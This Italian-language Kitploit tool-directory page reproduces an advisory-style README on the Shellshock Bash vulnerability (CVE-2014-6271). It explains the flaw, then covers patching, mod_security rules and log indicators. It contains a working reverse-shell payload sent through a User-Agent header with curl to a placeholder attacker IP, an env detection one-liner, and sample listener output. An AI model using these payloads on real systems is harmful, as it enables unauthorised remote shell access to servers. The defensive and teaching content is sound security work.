Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-6271 — CVE-2014-6271 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2014-6271
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPapers & ResearchLearning & Education
GitHub0xblackash/cve-2014-6271

CVE-2014-6271

CVE-2014-6271

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2014-6271 — “Shellshock”

shellshock

Zero-Day di 25 anni di Esecuzione Remota di Codice in GNU Bash tramite Variabili d'Ambiente

Severity CVSS Affected Patched


📖 Panoramica

CVE-2014-6271, soprannominato Shellshock (noto anche come Bashdoor), è una vulnerabilità critica di esecuzione remota di codice (RCE) nella shell GNU Bash.
Un attaccante può inviare variabili d'ambiente appositamente create (tramite intestazioni HTTP, DHCP, SSH, ecc.) e ottenere accesso remoto alla shell del server sottostante — spesso senza autenticazione e con minima interazione dell'utente.


🧠 Riepilogo della Vulnerabilità


⚙️ Analisi Tecnica

📨 Step 1 — Variabile d'Ambiente Malevola

L'attaccante inietta una variabile appositamente creata (es. nell'intestazione User-Agent):

root@kitploit:~
() { :; }; /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1

🧩 Step 2 — Difetto di Parsing delle Funzioni di Bash

Bash interpreta erroneamente il payload come definizione di funzione + comandi finali. Il codice dopo (); viene eseguito immediatamente quando la variabile viene importata.

💣 Step 3 — Esecuzione Remota

Il comando viene eseguito con i privilegi del server web / processo (spesso root o www-data).

Risultato:

root@kitploit:~
# Accesso remoto alla shell ottenuto
whoami
www-data

✅ Se l'operazione ha successo, ecco ESATTAMENTE ciò che vedrai (passo dopo passo):

shellshock

1. Nel tuo terminale (subito dopo aver eseguito il PoC)

root@kitploit:~
✅ Vulnerable! (Shellshock RCE triggered)
vulnerable
test

Vedrai anche la reverse shell connettersi immediatamente.

2. Quando esegui il comando di rilevamento

root@kitploit:~
env x='() { :;}; echo vulnerable' bash -c "echo test"

Restituirà immediatamente:

root@kitploit:~
vulnerable
test

(Questo conferma che Bash ha eseguito il comando iniettato.)

3. La VERA prova del successo — nel tuo browser o curl (questo è il momento in cui sai di avere piena RCE)

Esegui questo curl contro uno script CGI Apache vulnerabile:

root@kitploit:~
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" http://vulnerable-server/cgi-bin/test.sh

Vedrai questo esatto output nel tuo listener netcat:

root@kitploit:~
bash: no job control in this shell
www-data@server:/var/www$ whoami
www-data
www-data@server:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www$ ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 24 14:00 .
...

Questo output appare direttamente nella tua reverse shell. Nessun errore, nessun 404.
Questo significa che hai piena esecuzione remota di codice sul server — l'iniezione di variabili d'ambiente ha funzionato perfettamente.


🎯 Perché è Pericoloso

  • ⚡ Zero-day di 25 anni (esisteva dal 1989)
  • 🌐 Superficie di attacco estremamente ampia (CGI, DHCP, SSH, OpenVPN, CUPS…)
  • 🔓 Nessuna autenticazione richiesta nei vettori più comuni
  • 🧨 Capacità di piena RCE
  • 📂 Potenziale esfiltrazione dati e ingresso ransomware
  • 🔁 Wormable in reti di grandi dimensioni

📦 Versioni Affette

Tutte le versioni di GNU Bash:

root@kitploit:~
1.14 fino a 4.3 (prima del patch level 30)

(inclusi Linux, macOS, BSD, dispositivi embedded)


✅ Versione Corretta

Aggiorna immediatamente a:

root@kitploit:~
Bash 4.3 patch level 30 o successivo (4.4+ raccomandato)

🛡️ Passi di Mitigazione

1️⃣ Azione Immediata

  • Aggiorna Bash su TUTTI i sistemi:
    root@kitploit:~
    # Ubuntu/Debian
    apt update && apt install --only-upgrade bash
    
    # Red Hat/CentOS
    yum update bash
    

2️⃣ Rafforzare il Server Web

  • Disabilita CGI/mod_cgi dove possibile
  • Usa regole mod_security per bloccare () {
  • Limita il passaggio di variabili d'ambiente

3️⃣ Monitorare i Log

Cerca:

  • User-Agent/Referer sospetto contenente () {
  • Reverse shell inaspettate o connessioni in uscita
  • Bash che genera processi figli da servizi web

🔍 Suggerimenti per il Rilevamento

Indicatori di compromissione possono includere:

  • Log contenenti () { :;};
  • File inaspettati creati dall'utente del server web
  • Connessioni in uscita su porte alte
  • Server web che genera /bin/bash -i

🧪 Proof-of-Concept (Concettuale)

root@kitploit:~
Intestazione/DHCP/SSH malevolo → Bash importa la variabile d'ambiente
        ↓
Definizione di funzione + comandi finali eseguiti
        ↓
Comando arbitrario / reverse shell

📌 Vulnerabilità Correlata

Questo problema ha portato a molteplici CVE successive (correzioni incomplete):

  • CVE-2014-7169 (AfterShock)
  • CVE-2014-6277 / CVE-2014-6278
  • CVE-2014-7186 / CVE-2014-7187

📊 Valutazione dell'Impatto

Area di RischioImpatto
Riservatezza🔴 Alto
Integrità🔴 Alto
Disponibilità🔴 Alto

🧩 Lezioni Apprese

  • Non fidarti mai delle variabili d'ambiente
  • Il parsing delle funzioni nelle shell deve essere estremamente rigoroso
  • Bug di lunga durata nei componenti core del sistema sono catastrofici
  • La correzione da sola non è sufficiente — rafforza le superfici d'attacco

📚 Riferimenti

  • NVD – CVE-2014-6271
  • Wikipedia – Shellshock
  • Red Hat Security Blog
  • Qualys Technical Analysis
  • CISA Alert TA14-268A

🚨 Raccomandazione Finale

Se gestisci un server Linux/macOS/BSD nel 2026: 🔥 Correggi Bash immediatamente (anche su sistemi air-gapped). 💡 Considera compromesso se Bash non corretto esposto a internet. 🛡 Esegui una revisione completa dei log e controlli di integrità.

Scarica lo strumento
CampoValore
CVE IDCVE-2014-6271
Gravità🔴 Critico
CVSS10.0 (Massimo)
Vettore d'AttaccoRemoto (HTTP, DHCP, SSH, ecc.)
Autenticazione Richiesta❌ Nessuna (in molti vettori)
Interazione Utente❌ Nessuna (nei casi CGI/DHCP)
ImpattoCompromissione Completa del Server